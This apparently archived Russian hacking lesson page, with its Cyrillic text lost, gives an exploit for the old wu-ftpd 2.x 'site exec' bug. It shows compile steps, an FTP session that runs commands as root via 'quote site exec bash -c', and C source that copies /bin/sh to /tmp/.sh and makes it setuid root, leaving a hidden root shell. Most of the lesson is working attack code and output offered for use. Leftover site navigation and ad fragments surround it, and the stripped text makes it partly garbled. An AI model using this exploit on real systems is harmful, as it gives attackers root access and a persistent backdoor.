2211
| | UKA.ru | Gossip.ru | ! | massovka | vaticancitystate.ru | From 24.11.97
Lesson 021
----------

: explot wu-ftp 2.x (site exec bug).

 account     wu-ftpd
    :
	cc -o ftpbug ftpbug.c

  :

220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. 
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id"      (   sys )
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200  (end of 'bash -c id')
ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
200-bash -c /yer/home/dir/ftpbug
200  (end of 'bash -c /yer/home/dir/ftpbug')
ftp> quit
221 Goodbye.

   suid root shell  /tmp/.sh

#include 
#include 
#include 

main()
{
   seteuid(0);
   system("cp /bin/sh /tmp/.sh");
   system("chmod 6777 /tmp/.sh");
}

PS. Thanx to StaTiC

123123
| | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | From 24.11.97
DlyaVas.ru , , , !

(15 )

(13 )


VAZHNO.RU

(15 )

(13 )


VAZHNO.RU
uka.ru